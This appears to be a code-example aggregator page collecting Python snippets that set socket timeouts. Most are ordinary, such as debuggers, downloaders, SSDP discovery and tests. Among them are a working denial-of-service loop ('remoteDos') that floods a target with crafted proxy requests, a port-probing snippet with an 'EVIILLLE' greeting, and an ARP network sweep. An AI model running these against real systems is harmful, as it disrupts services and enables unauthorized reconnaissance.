def __init__(self, port = 9000, max_children = '32', max_data = '1024', max_depth = '1', minibufexpl = '0', debug = 0):
    """ initialize Debugger """
    socket.setdefaulttimeout(5)
    self.port       = port
    self.debug      = debug

    self.current    = None
    self.file       = None
    self.lasterror  = None
    self.msgid      = 0
    self.running    = 0
    self.stacks     = []
    self.curstack   = 0
    self.laststack  = 0
    self.bptsetlst  = {} 

    self.status        = None
    self.max_children  = max_children
    self.max_data      = max_data
    self.max_depth     = max_depth

    self.protocol   = DbgProtocol(self.port)

    self.ui         = DebugUI(minibufexpl)
    self.breakpt    = BreakPoint()

    vim.command('sign unplace *')
	def checkTraficLight(self):

		self.activityTimer.callback.remove(self.checkTraficLight)
		self.activityTimer.start(100, False)

		currentTimeoutDefault = socket.getdefaulttimeout()
		socket.setdefaulttimeout(3)
		message = ""
		picon = None
		default = True
		try:
			# TODO: Use Twisted's URL fetcher, urlopen is evil. And it can
			# run in parallel to the package update.
			status = urlopen("http://openpli.org/status/").read().split('!', 1)
			if getBoxType() in status[0].split(','):
				message = len(status) > 1 and status[1] or _("The current beta image might not be stable.\nFor more information see %s.") % ("www.openpli.org")
				picon = MessageBox.TYPE_ERROR
				default = False
		except:
			message = _("The status of the current beta image could not be checked because %s can not be reached.") % ("www.openpli.org")
			picon = MessageBox.TYPE_ERROR
			default = False
		socket.setdefaulttimeout(currentTimeoutDefault)
		if default:
			self.showDisclaimer()
		else:
			message += "\n" + _("Do you want to update your receiver?")
			self.session.openWithCallback(self.startActualUpdate, MessageBox, message, default = default, picon = picon)
Example #3
    def _get_metadata(agentConfig):
        if GCE.metadata is not None:
            return GCE.metadata

        if not agentConfig['collect_instance_metadata']:
            log.info("Instance metadata collection is disabled. Not collecting it.")
            GCE.metadata = {}
            return GCE.metadata

        socket_to = None
        try:
            socket_to = socket.getdefaulttimeout()
            socket.setdefaulttimeout(GCE.TIMEOUT)
        except Exception:
            pass

        try:
            opener = urllib2.build_opener()
            opener.addheaders = [('X-Google-Metadata-Request','True')]
            GCE.metadata = json.loads(opener.open(GCE.URL).read().strip())

        except Exception:
            GCE.metadata = {}

        try:
            if socket_to is None:
                socket_to = 3
            socket.setdefaulttimeout(socket_to)
        except Exception:
            pass
        return GCE.metadata
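The helper above temporarily overrides the process-wide default socket timeout and then restores whatever value was in effect before. A minimal standalone sketch of that save-and-restore idiom, assuming a plain urllib fetch; the function name, URL, and timeout value are placeholders, not part of the snippet above:

import socket
import urllib.request


def fetch_with_temporary_timeout(url, timeout=5):
    """Fetch a URL while a temporary process-wide default socket timeout is in effect."""
    previous = socket.getdefaulttimeout()   # may be None (no timeout)
    socket.setdefaulttimeout(timeout)       # applies to every socket created from now on
    try:
        with urllib.request.urlopen(url) as resp:
            return resp.read()
    finally:
        socket.setdefaulttimeout(previous)  # always restore the earlier default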
Example #4
def testInetConnectivity(target="http://www.google.com"):
	"""
	test if we get an answer from the specified url
	
	@param target:
	@return: bool
	"""
	printl2("", "__common__::testInetConnectivity", "S")

	import urllib2
	from   sys import version_info
	import socket

	try:
		opener = urllib2.build_opener()

		if version_info[1] >= 6:
			page = opener.open(target, timeout=2)
		else:
			socket.setdefaulttimeout(2)
			page = opener.open(target)
		if page is not None:
			printl2("success, returning TRUE", "__common__::testInetConnectivity", "D")
			printl2("", "__common__::testInetConnectivity", "C")
			return True
		else:
			printl2("failure, returning FALSE", "__common__::testInetConnectivity", "D")
			printl2("", "__common__::testInetConnectivity", "C")
			return False
	except:
		printl2("exception, returning FALSE", "__common__::testInetConnectivity", "D")
		printl2("", "__common__::testInetConnectivity", "C")
		return False
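A possible call site for the connectivity check above; the two branch functions are placeholders for whatever the surrounding plugin actually does:

# Hypothetical usage: only start network-dependent work when the check succeeds.
if testInetConnectivity("http://www.google.com"):
    startOnlineTasks()    # placeholder, not part of the original module
else:
    showOfflineMessage()  # placeholder, not part of the original module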
    def start_scheduler(self):
        c = self.colored
        if self.pidfile:
            platforms.create_pidlock(self.pidfile)
        beat = self.Service(app=self.app,
                            max_interval=self.max_interval,
                            scheduler_cls=self.scheduler_cls,
                            schedule_filename=self.schedule)

        print(str(c.blue('__    ', c.magenta('-'),
                  c.blue('    ... __   '), c.magenta('-'),
                  c.blue('        _\n'),
                  c.reset(self.startup_info(beat)))))
        self.setup_logging()
        if self.socket_timeout:
            logger.debug('Setting default socket timeout to %r',
                         self.socket_timeout)
            socket.setdefaulttimeout(self.socket_timeout)
        try:
            self.install_sync_handler(beat)
            beat.start()
        except Exception, exc:
            logger.critical('celerybeat raised exception %s: %r',
                            exc.__class__, exc,
                            exc_info=True)
Example #6
def main(argv=None):
    import getpass
    import json
    import logging
    socket.setdefaulttimeout(10)

    logging.basicConfig(
        level=logging.DEBUG, format='%(asctime)s %(levelname)-5.5s %(message)s')
    parser = argparse.ArgumentParser()
    parser.add_argument(action='store', dest='config')
    parser.add_argument(nargs='?', action='store', dest='username')
    args = parser.parse_args(argv)
    ldap = LDAP(args.config)
    username = args.username
    if not username:
        username = input("Username: ")
    # NOTE: the credential-prompt and auth-call lines below were masked in the source; reconstructed approximately.
    password = getpass.getpass("Password: ")
    result = ldap.authenticate(username, password)  # assumed method name on the LDAP helper
    print("Result: %s" % json.dumps(result, sort_keys=True))

    if result["status"] == "unknown":
        print("No user named '%s' found." % username)
        raise SystemExit(1)

    if result["status"] == "reject":
        print("Authentication of user named '%s' failed." % username)
        raise SystemExit(2)

    print("Authentication successful, the user is member of the following groups: %s" % ', '.join(result.get("groups", [])))
Example #7
    def get_tags():
        socket_to = None
        try:
            socket_to = socket.getdefaulttimeout()
            socket.setdefaulttimeout(EC2.TIMEOUT)
        except Exception:
            pass

        try:
            iam_role = urllib2.urlopen(EC2.URL + "/iam/security-credentials").read().strip()
            iam_params = json.loads(urllib2.urlopen(EC2.URL + "/iam/security-credentials" + "/" + unicode(iam_role)).read().strip())
            from checks.libs.boto.ec2.connection import EC2Connection
            connection = EC2Connection(aws_access_key_id=iam_params['AccessKeyId'], aws_secret_access_key=iam_params['SecretAccessKey'], security_token=iam_params['Token'])
            instance_object = connection.get_only_instances([EC2.metadata['instance-id']])[0]

            EC2_tags = [u"%s:%s" % (tag_key, tag_value) for tag_key, tag_value in instance_object.tags.iteritems()]

        except Exception:
            log.exception("Problem retrieving custom EC2 tags")
            EC2_tags = []

        try:
            if socket_to is None:
                socket_to = 3
            socket.setdefaulttimeout(socket_to)
        except Exception:
            pass

        return EC2_tags
Example #8
def getnzb(link, title, output):
    if not os.path.isdir(output):
        try:
            os.makedirs(output)
        except:
            if len(str(sys.exc_info()[1])) > 0:
                print(sys.exc_info()[1])
            return False

    output = os.path.join(output, title.replace(' ', '_') + '.nzb')

    try:
        socket.setdefaulttimeout(30)
        urllib.request.urlretrieve(link, output)
    except:
        if len(str(sys.exc_info()[1])) > 0:
            print(sys.exc_info()[1])
        return False

    if os.path.getsize(output) == 0 or not os.path.isfile(output):
        print('Error downloading: %s' % (title))
        try:
            os.unlink(output)
        except:
            if len(str(sys.exc_info()[1])) > 0:
                print(sys.exc_info()[1])
        return False

    print('%r downloaded successfully.' % (output))
    return True
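One way the downloader above might be called; the URL, title, and output directory are purely illustrative:

# Illustrative call: fetch a single NZB into a local folder (the 30 s default socket timeout applies).
if not getnzb("http://example.com/files/12345.nzb", "Some Release Title", "/tmp/nzbs"):
    print("download failed")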
 def handle_request( self, trans, url, http_method=None, **kwd ):
     if 'Name' in kwd and not kwd[ 'Name' ]:
         # Hack: specially handle parameters named "Name" if no param_value is given
         # by providing a date / time string - guarantees uniqueness, if required.
         kwd[ 'Name' ] = time.strftime( "%a, %d %b %Y %H:%M:%S", time.gmtime() )
     if 'Comments' in kwd and not kwd[ 'Comments' ]:
         # Hack: specially handle parameters named "Comments" if no param_value is given
         # by providing a date / time string.
         kwd[ 'Comments' ] = time.strftime( "%a, %d %b %Y %H:%M:%S", time.gmtime() )
     socket.setdefaulttimeout( 600 )
     # The following calls to urllib2.urlopen() will use the above default timeout.
     try:
         if not http_method or http_method == 'get':
             page = urllib2.urlopen( url )
             response = page.read()
             page.close()
             return response
         elif http_method == 'post':
             page = urllib2.urlopen( url, urllib.urlencode( kwd ) )
             response = page.read()
             page.close()
             return response
         elif http_method == 'put':
             url += '/' + str( kwd.pop( 'id' ) ) + '?key=' + kwd.pop( 'key' )
             output = self.put( url, **kwd )
     except Exception, e:
         message = 'Problem sending request to the web application: %s.  URL: %s.  kwd: %s.  Http method: %s' % \
             ( str( e ), str( url ), str( kwd ), str( http_method ) )
         return self.handle_failure( trans, url, message )
Example #10
  def __init__(self, port=9000, max_children='32', max_data='1024', max_depth='1', minibufexpl='0', debug=0, proxy_host='localhost', proxy_port=None, proxy_key=None):
    """ initialize Debugger """
    socket.setdefaulttimeout(5)
    self.port       = port
    self.proxy_host = proxy_host
    self.proxy_port = proxy_port
    self.proxy_key  = proxy_key
    self.debug      = debug

    self.current    = None
    self.file       = None
    self.lasterror  = None
    self.msgid      = 0
    self.running    = 0
    self.stacks     = []
    self.curstack   = 0
    self.laststack  = 0
    self.bptsetlst  = {} 

    self.status        = None
    self.max_children  = max_children
    self.max_data      = max_data
    self.max_depth     = max_depth

    self.protocol   = DbgProtocol(self.port, self.proxy_host, self.proxy_port, self.proxy_key)

    self.ui         = DebugUI(minibufexpl)
    self.breakpt    = BreakPoint()

    self.file_mapping = list(vim.eval('debuggerFileMapping'))
    self.mapped_files = {}

    vim.command('sign unplace *')
Example #11
def discover(service, timeout=2, retries=1):
    group = ("239.255.255.250", 1900)
    message = "\r\n".join([
        'M-SEARCH * HTTP/1.1',
        'HOST: {0}:{1}',
        'MAN: "ssdp:discover"',
        'ST: {st}','MX: 3','',''])
    socket.setdefaulttimeout(timeout)
    responses = {}
    for _ in range(retries):
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
        sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 2)
        sock.sendto(message.format(*group, st=service), group)
        while True:
            try:
                response = SSDPResponse(sock.recv(1024))
                responses[response.location] = response
            except socket.timeout:
                break
    return responses.values()

# Example:
# import ssdp
# ssdp.discover("roku:ecp")
Example #12
def get_news_urls(module):
    """Get all urls of certain module
    
    :param module: urls of which module to get
    :returns: urls - a list of urls

    """
    urls = []

    # get index range firstly
    # http://news2.sysu.edu.cn/news01/index.htm
    req = post_module.req_get_news_urls(module)
    result = opener.open(req).read()
    start, end = get_index_range(result)

    # get urls in index.htm
    urls.extend(html_extracting.find_news_urls(result, module))

    # index1.htm to end will be crawled in the following loop
    socket.setdefaulttimeout(100)
    for i in range(int(start), int(end) + 1):
        req = post_module.req_get_news_urls(module, i)
        result = opener.open(req).read()
        urls.extend(html_extracting.find_news_urls(result, module))
    socket.setdefaulttimeout(10)

    return urls
Example #13
    def __init__(self, host, port, locationTemplate, timeout=5, ssl=False):
        """Create an instance of *HttpReader* bound to specific URL.

           Note:
               The `http_proxy` and `https_proxy` environment variables are
               respected by the underlying `urllib` stdlib module.

           Args:
               host (str): domain name or IP address of web server
               port (int): TCP port web server is listening
               locationTemplate (str): location part of the URL optionally containing @mib@
                   magic placeholder to be replaced with MIB name. If @mib@ magic is not present,
                   MIB name is appended to `locationTemplate`

           Keyword Args:
               timeout (int): response timeout
               ssl (bool): access HTTPS web site
        """
        self._url = '%s://%s:%d%s' % (ssl and 'https' or 'http',
                                      host, port, decode(locationTemplate))

        socket.setdefaulttimeout(timeout)
        self._user_agent = 'pysmi-%s; python-%s.%s.%s; %s' % (
            pysmi_version, sys.version_info[0], sys.version_info[1],
            sys.version_info[2], sys.platform
        )
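A sketch of how such a reader might be constructed, following the docstring above; the host and location template are placeholders, and no methods beyond the constructor are assumed:

# Placeholder host/path; per the docstring, @mib@ is substituted with the MIB name on fetch.
reader = HttpReader('mibs.example.org', 80, '/asn1/@mib@', timeout=10, ssl=False)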
Example #14
	def connect(self):
		HOST = ''
		PORT = 9000
		socket.setdefaulttimeout(3)
		self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
		try:
			self.s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
			self.s.bind((HOST, PORT))
			self.s.listen(5)
			self.queue.put("listening...")
			self.status = 'listening'
			self.conn, addr = self.s.accept()
			self.status = 'running'
			response = self.receive()
			output = {
				'addr': str(addr),
				'console': response
			}
		except socket.timeout:
			self.s.shutdown(socket.SHUT_RDWR)
			self.s.close()
			self.s = None
			output = {'response': 'Timeout. Connection closed.'}
			self.status = 'idle'

		self.queue.put(output)
Example #15
def myproxy(url):
	req = urllib2.Request(url)
	try:

		# Important or if the remote server is slow
		# all our web server threads get stuck here
		# But this is UGLY as Python does not provide per-thread
		# or per-socket timeouts thru urllib
		orignal_timeout = socket.getdefaulttimeout()
		try:
			socket.setdefaulttimeout(60)

			response = urllib2.urlopen(req)
		finally:
			# restore orignal timeoout
			socket.setdefaulttimeout(orignal_timeout)

		# XXX: How to stream respone through Zope
		# AFAIK - we cannot do it currently

		return response.read()

	except HTTPError, e:
		# Have something more useful to log output as plain urllib exception
		# using Python logging interface
		# http://docs.python.org/library/logging.html
		logger.error("Server did not return HTTP 200 when calling remote proxy URL:" + url)
		# NOTE: `params` is expected to come from the enclosing scope (e.g. the proxied request's form data)
		for key, value in params.items():
			logger.error(key + ": "  + value)

		# Print the server-side stack trace / error page
		logger.error(e.read())

		raise e
Example #16
    def testDefaultTimeout(self):
        # Testing default timeout
        # The default timeout should initially be None
        self.assertEqual(socket.getdefaulttimeout(), None)
        s = socket.socket()
        self.assertEqual(s.gettimeout(), None)
        s.close()

        # Set the default timeout to 10, and see if it propagates
        socket.setdefaulttimeout(10)
        self.assertEqual(socket.getdefaulttimeout(), 10)
        s = socket.socket()
        self.assertEqual(s.gettimeout(), 10)
        s.close()

        # Reset the default timeout to None, and see if it propagates
        socket.setdefaulttimeout(None)
        self.assertEqual(socket.getdefaulttimeout(), None)
        s = socket.socket()
        self.assertEqual(s.gettimeout(), None)
        s.close()

        # Check that setting it to an invalid value raises ValueError
        self.assertRaises(ValueError, socket.setdefaulttimeout, -1)

        # Check that setting it to an invalid type raises TypeError
        self.assertRaises(TypeError, socket.setdefaulttimeout, "spam")
Example #17
def discover(timeout=1.5):
    """Crude SSDP discovery. Returns a list of RxvDetails objects
       with data about Yamaha Receivers in local network"""
    socket.setdefaulttimeout(timeout)
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
    sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 2)
    sock.sendto(SSDP_MSEARCH_QUERY.encode("utf-8"), (SSDP_ADDR, SSDP_PORT))

    responses = []
    try:
        while True:
            responses.append(sock.recv(10240))
    except socket.timeout:
        pass

    results = []
    for res in responses:
        m = re.search(r"LOCATION:(.+)", res.decode('utf-8'), re.IGNORECASE)
        if not m:
            continue
        url = m.group(1).strip()
        res = rxv_details(url)
        if res:
            results.append(res)

    return results
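A hedged usage sketch for the discovery helper above; it only prints the returned objects, since the attributes of RxvDetails are not shown in this snippet:

# Broadcast an SSDP M-SEARCH and report anything that answered within the timeout.
for details in discover(timeout=1.5):
    print(details)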
Example #18
    def _call_api(self, api_url, err_env):
        """urlopen(), plus error handling and possible retries.

        err_env is a dict of additional info passed to the error handler
        """
        while True:  # may retry on error
            api_request = urllib2.Request(
                api_url, headers={"Accept-Encoding": "gzip"})

            log.debug("Amazon URL: %s" % api_url)

            try:
                if self.Timeout and sys.version[:3] in ["2.4", "2.5"]:
                    # urllib2.urlopen() doesn't accept timeout until 2.6
                    old_timeout = socket.getdefaulttimeout()
                    try:
                        socket.setdefaulttimeout(self.Timeout)
                        return urllib2.urlopen(api_request)
                    finally:
                        socket.setdefaulttimeout(old_timeout)
                else:
                    # the simple way
                    return urllib2.urlopen(api_request, timeout=self.Timeout)
            except:
                if not self.ErrorHandler:
                    raise

                exception = sys.exc_info()[1]  # works in Python 2 and 3
                err = {'exception': exception}
                err.update(err_env)
                if not self.ErrorHandler(err):
                    raise
 def obtain_masters(self):
     '''
     This method use the service 'list_masters' of the master_discoverer to get
     the list of discovered ROS master. Based on this list the L{SyncThread} for
     synchronization will be created.
     @see: U{master_discovery_fkie.interface_finder.get_listmaster_service()
         <http://docs.ros.org/api/master_discovery_fkie/html/modules.html#interface-finder-module>}
     '''
     if not rospy.is_shutdown():
         service_names = interface_finder.get_listmaster_service(masteruri_from_master(), False)
         for service_name in service_names:
             try:
                 with self.__lock:
                     try:
                         socket.setdefaulttimeout(5)
                         discoverMasters = rospy.ServiceProxy(service_name, DiscoverMasters)
                         resp = discoverMasters()
                         masters = []
                         master_names = [m.name for m in resp.masters]
                         rospy.loginfo("ROS masters obtained from '%s': %s", service_name, master_names)
                         for m in resp.masters:
                             if self._can_sync(m.name):  # do not sync to the master, if it is in ignore list or not in filled sync list
                                 masters.append(m.name)
                             self.update_master(m.name, m.uri, m.timestamp, m.timestamp_local, m.discoverer_name, m.monitoruri, m.online)
                         for key in set(self.masters.keys()) - set(masters):
                             self.remove_master(self.masters[key].name)
                     except rospy.ServiceException, e:
                         rospy.logwarn("ERROR Service call 'list_masters' failed: %s", str(e))
             except:
                 import traceback
                 rospy.logwarn("ERROR while initial list masters: %s", traceback.format_exc())
             finally:
                 socket.setdefaulttimeout(None)
         self.update_timer = threading.Timer(self.UPDATE_INTERVALL, self.obtain_masters)
         self.update_timer.start()
Example #20
    def remoteDos(self):
        socket.setdefaulttimeout(10) # Set the timeout to 10 seconds

        try:
            print "[+] Launching attack against %s:%d" % (self.target, self.port)

            aTime = time.time()
            for i in range(1,2000): # Commonly, 1035 queries are sufficient enough
                    if time.time() - aTime > 5: # More than XX seconds waiting, it worked
                        print
                        print "[+] Exploit works!"
                        return True

                    aTime = time.time()
                    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                    s.connect((self.target, self.port))
                    s.send("GET ftp://user:pass@localhost:%s HTTP/1.0\r\n\r\n" % int(self.port))
                    s.close()
                    sys.stdout.write("\b"*20 + "--> Connection #%d" % i)
                    sys.stdout.flush()
        except KeyboardInterrupt:
            print
            print "Aborted."

            return False
        except socket.timeout:
            if i > 50: # Count as a valid DOS condition if we sent at least 50 packets
                print
                print "[+] Exploit works!"
                return True
            else:
                raise
Example #21
    def run(self, root_url, root_host):
        # Reset the storage pool
        global store_pool
        store_pool = FileStorePool()

        # Set the host name used to filter URLs
        DownloadUrl.filter_host_name = root_host

        socket.setdefaulttimeout(6)
        root_my_url = DownloadUrl(root_url, root_host, None)
        self.url_queue.put(root_my_url)
 
        # if has thread running or url_queue is not empty
        while True:
            try:
                top = self.url_queue.get(timeout=30)
            except Exception:
                print '网站爬取完成'.decode('utf-8')  # "site crawl finished"
                break

            abs_url = top.get_abs_url()
            try:
                md5_builder = hashlib.md5()
                md5_builder.update(abs_url)
                md5_url = md5_builder.hexdigest()
            except Exception, e:
                print 'md5 build error at: %s' % abs_url
                continue

            if self.is_visited(md5_url):
                continue

            thread = DownloadThread(top, self.url_queue, self.thread_pool)
            self.thread_pool.acquire()
            thread.start()
Example #22
    def __init__(self):
        self.isAuthenticated = False
        self.loggedInUsername = ''
        self.loggedInPassword = '' # Testing only
        self.defaultPassword = ''
        self.testingHost = None
        self.authTimestampSeconds = None
        self.masterConnectionBroken = False
        socket.setdefaulttimeout(15)
        
        self.testMode = False
        # The testing.txt file is used for testing only
        testFilename = sys.path[0]
        if testFilename == '':
            testFilename = '.'
        testFilename += '/testing.txt'
        if os.path.isfile(testFilename):
            self.testMode = True
            testingFile = open(testFilename)
            for line in testingFile:
                match = re.match(r'host=([a-zA-Z0-9-]+)', line)
                if match:
                    self.testingHost = match.group(1)
                match = re.match(r'password=([a-zA-Z0-9-]+)', line)
                if match:
                    self.defaultPassword = match.group(1)

            testingFile.close()
 def changep(self):
   print 'changing proxy'
   socket.setdefaulttimeout(3.0)
   test_url = 'http://www.baidu.com'
   while True:
     try:
       proxy = random.choice(Proxypool)
       proxy =  'http://'+proxy
       print proxy
     except:
       continue
     try:
       start = time.time()
       f = urllib.urlopen(test_url,proxies={'http':proxy})
       f.close()
     except:
       continue
     else:
       end=time.time()
       dur = end - start
       print proxy,dur
       if dur <= 2:
         print 'proxy changed to'
         print proxy
         self.proxy = proxy
         self.proxy_usetime =0
         break
       else:
         continue
def da_connect(ip, port):
    try:
        socket.setdefaulttimeout(1)
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((ip, port))
        s.send('Hello! This is EVIILLLE calling! Anyone home?')
        data = s.recv(1024)

        print 'We hit something! Received' + str(data)
        print 'Logging hit on the network.'

        fo = open("hits.txt", "a")
        now = time.strftime("%c")

        # date and time representation
        print "Current date & time " + time.strftime("%c")
        toFoOut = "We hit " + str(ip) + ": " + str(port) + ": " + time.strftime("%c")

        # write to file
        fo.write(toFoOut + '\n')
        fo.close()
        print 'Wrote to log file.'

        # We want to close the connection after we opened it.
        # This is for logging open ports and nothing more at the moment.
        # Muhahahahahahaha.
        s.shutdown(socket.SHUT_RDWR)
        s.close()
    
    except:
        return
def main(args, loglevel):
    logging.basicConfig(format="%(levelname)s: %(message)s", level=loglevel)

    socket.setdefaulttimeout(args.timeout)
    
    g = Github()
    with open(args.repo_file, 'r') as f:
        file_counter = 0
        for line in f.readlines():
            logging.info('Fetching repository: %s' % line)
            try:
                repo_str = line.rstrip().split('github.com/')[-1]
                repo = g.get_repo(repo_str)
                tree = repo.get_git_tree('master', recursive=True)
                files_to_download = []
                for file in tree.tree:
                    if fnmatch.fnmatch(file.path, args.wildcard):
                        files_to_download.append('https://github.com/%s/raw/master/%s' % (repo_str, file.path))
                for file in files_to_download:
                    logging.info('Downloading %s' % file)
                    file_counter += 1
                    filename = posixpath.basename(urlparse.urlsplit(file).path)
                    output_path = os.path.join(args.output_dir, filename)
                    if os.path.exists(output_path):
                        output_path += "-" + str(file_counter)
                    try:
                        urllib.urlretrieve(file, output_path)
                    except:
                        logging.error('Error downloading %s' % file)
            except:
                logging.error('Error fetching repository %s' % line)
Example #26
def setup_modules():
    """
    Perform any global module setup needed by MyPyTutor.

    """
    import socket
    socket.setdefaulttimeout(GLOBAL_TIMEOUT)
Example #27
 def scan_block(self):
     """ ARPing the local network
     """
     conf.verb = 0
     print '[!] Beginning host scan with netmask %s...' % (self.net_mask)
     try:
         start = datetime.now()
         (ans, unans) = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=self.net_mask),timeout=1, inter=0.1,multi=True)
         elapsed = (datetime.now() - start).seconds
         print '[!] Scan of %s completed in %s seconds with %d hosts responding.'%(self.net_mask,elapsed,len(ans))
         for s, r in ans:
             ip = r[ARP].getfieldval('psrc')
             mac = r[ARP].getfieldval('hwsrc')
             if self.fingerprint:
                 host = ''
                 try:
                     if hasattr(socket, 'setdefaulttimeout'):
                         socket.setdefaulttimeout(3)
                     host = socket.gethostbyaddr(ip)[0]
                 except:
                     host = ''
                 print "\t%s : %s (%s)" % (mac, ip, host)
                 self._dbhost(mac, ip, host)
             else:
                 print '\t%s : %s' % (mac, ip)
                 self._dbhost(mac, ip, '')
             self.available_hosts[mac] = ip
     except Exception:
         Error('Error with net mask.  Cannot scan given block.')
         return
     print '\n'
def downloadPackage(strUrl, dest, module, timeout=120):
    print strUrl, dest, region, module  # NOTE: 'region' is not defined in this snippet; presumably a module-level global
    print "--- prepare to download data for " + module
    if not os.path.exists(dest):
        os.makedirs(dest)
    
    socket.setdefaulttimeout(timeout)
    component = strUrl.split("/")[-1]
    componentTar = os.path.splitext(component)[-2]
    try:
        urllib.urlretrieve(strUrl, dest + os.sep + component)
    except socket.error:
        errno, errstr = sys.exc_info()[:2]
        if errno == socket.timeout:
            print "There was a timeout"
            print "--- Download failed ---"
            print "--- Clean the broken data ---"
            os.remove(dest + os.sep + component)
            print "--- Start to retry downloading ---"
            urllib.urlretrieve(strUrl, dest + os.sep + component)
        else:
            print "There was other socket error!"
    except Exception, e:
        print "Other exceptions!", e
        print "--- Download failed ---"
        print "--- Clean the broken data ---"
        os.remove(dest + os.sep + component)
        print "--- Start to retry downloading ---"
        urllib.urlretrieve(strUrl, dest + os.sep + component)
Example #29
    def _start_server(self):
        """Start up a viewing server."""
        # Start viewer server
        # IMPORTANT: if running in an IPython/Jupyter notebook,
        # use the no_ioloop=True option
        from ginga.web.pgw import ipg
        if not self._port:
            import socket
            import errno
            socket.setdefaulttimeout(0.05)
            ports = [p for p in range(8800, 9000) if
                     socket.socket().connect_ex(('127.0.0.1', p)) not in
                     (errno.EAGAIN, errno.EWOULDBLOCK)]
            self._port = ports[0]

        self._server = ipg.make_server(host=self._host,
                                       port=self._port,
                                       use_opencv=self.use_opencv,
                                       numthreads=self._threads)

        try:
            backend_check = get_ipython().config
        except NameError:
            backend_check = []
        no_ioloop = False  # ipython terminal
        if 'IPKernelApp' in backend_check:
            no_ioloop = True  # jupyter console and notebook

        self._server.start(no_ioloop=no_ioloop)
    def _get_nginx_status_stub_response(url):
        socket.setdefaulttimeout(5) # 5 seconds
        c = urllib2.urlopen(url)
        data = c.read()
        c.close()

        matchActive = re.search(r'Active connections:\s+(\d+)', data)
        matchHistory = re.search(r'\s*(\d+)\s+(\d+)\s+(\d+)', data)
        matchCurrent = re.search(r'Reading:\s*(\d+)\s*Writing:\s*(\d+)\s*'
            'Waiting:\s*(\d+)', data)

        if not matchActive or not matchHistory or not matchCurrent:
            raise Exception('Unable to parse {0}' . format(url))

        result = {}
        result['nginx_active_connections'] = int(matchActive.group(1))

        result['nginx_accepts'] = int(matchHistory.group(1))
        result['nginx_handled'] = int(matchHistory.group(2))
        result['nginx_requests'] = int(matchHistory.group(3))

        result['nginx_reading'] = int(matchCurrent.group(1))
        result['nginx_writing'] = int(matchCurrent.group(2))
        result['nginx_waiting'] = int(matchCurrent.group(3))

        return result
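For reference, the three regular expressions above are written against the plain-text page served by nginx's stub_status module; the counters in this sample are made up:

import re

sample = (
    "Active connections: 291\n"
    "server accepts handled requests\n"
    " 16630948 16630948 31070465\n"
    "Reading: 6 Writing: 179 Waiting: 106\n"
)
print(re.search(r'Active connections:\s+(\d+)', sample).group(1))   # 291
print(re.search(r'\s*(\d+)\s+(\d+)\s+(\d+)', sample).groups())      # ('16630948', '16630948', '31070465')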
Example #31
 def __init__(self, args):
     win32serviceutil.ServiceFramework.__init__(self, args)
     self.hWaitStop = win32event.CreateEvent(None, 0, 0, None)
     socket.setdefaulttimeout(60)
Example #32
import socket
print(socket)
socket.setdefaulttimeout(2)
s = socket.socket()
s.connect(("192.168.95.148", 21))
ans = s.recv(1024)
print ans
#220 FreeFloat Ftp Server (Version 1.00).
Example #33
def main():
    socket.setdefaulttimeout(15)
    url_file_name = 'vis10cat.txt'
    targets = ['PieChart']
    download(url_file_name, targets)
Example #34
import logging
import os
import threading
import time
import random
import string
import aria2p
import telegram.ext as tg
from dotenv import load_dotenv
from pyrogram import Client
from telegraph import Telegraph
import socket

socket.setdefaulttimeout(600)

botStartTime = time.time()
if os.path.exists('log.txt'):
    with open('log.txt', 'r+') as f:
        f.truncate(0)

logging.basicConfig(
    format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',
    handlers=[logging.FileHandler('log.txt'),
              logging.StreamHandler()],
    level=logging.INFO)

load_dotenv('config.env')

Interval = []

# -*- coding: utf-8 -*-
"""
Created on Mon May 22 15:16:34 2017

@author: ben
"""
"""
Crawl the list of projects pending review from the environmental impact assessment site
"""
import os, urllib, re, csv
from pyquery import PyQuery as pq
import socket  
import time  
timeout = 200  
sleepTime=1.5  
socket.setdefaulttimeout(timeout)  # set the timeout for the whole socket layer here; later socket use in this file does not need to set it again
headers = {
              }
def WriteText(filename,text):
    if os.path.exists(filename):
        os.remove(filename)
    try:
        fp=open(filename,'w')
        fp.write(text)
    except Exception as e:
        print(e)
        fp.close()
    fp.close()
def GetProjectList(url_cata):  # project data lives on two servers, hps.mep and www.zhb; one server's address is abbreviated
#    resp=urllib.request.Request(url_cata,headers=headers)
    request=urllib.request.urlopen(url_cata)
#!/usr/local/bin/python
# coding: utf-8

# import the required modules
import socket
import select
import time
import os
import threading
import sys
import platform

max_thread = 2  # maximum number of concurrent threads
timeout = 2  # wait time in seconds
socket.setdefaulttimeout(timeout)
# Set the timeout for socket operations; timeout is a float in seconds, and None means no timeout.
# If a download has not succeeded after timeout seconds, it is counted as failed and the next operation starts automatically.
sleep_time = 0.01  # delay before running a thread, in seconds
disallow_sleep_time = 600  #


# read the list of top-level domain name suffixes
def get_top_level_domain_name_suffix():
    top_level_domain_name_suffix_list = list()
    # create a list called top_level_domain_name_suffix_list to hold the suffixes (an array-like, zero-indexed container)
    with open('top_level_domain_name_suffix', 'r') as f:
        for line in f:
            if not line.startswith('//'):
                # startswith() checks whether a string begins with the given prefix and returns True if so, otherwise False.
                # Append the line to the list if it does not start with '//'.
                top_level_domain_name_suffix_list.append(line)
Example #37
def request(method,
            url,
            params=None,
            data=None,
            headers=None,
            cookies=None,
            files=None,
            auth=None,
            timeout=60,
            allow_redirects=False,
            stream=False):
    """Initiate an HTTP(S) request. Returns :class:`Response` object.

    :param method: 'GET' or 'POST'
    :type method: unicode
    :param url: URL to open
    :type url: unicode
    :param params: mapping of URL parameters
    :type params: dict
    :param data: mapping of form data ``{'field_name': 'value'}`` or
        :class:`str`
    :type data: dict or str
    :param headers: HTTP headers
    :type headers: dict
    :param cookies: cookies to send to server
    :type cookies: dict
    :param files: files to upload (see below).
    :type files: dict
    :param auth: username, password
    :type auth: tuple
    :param timeout: connection timeout limit in seconds
    :type timeout: int
    :param allow_redirects: follow redirections
    :type allow_redirects: bool
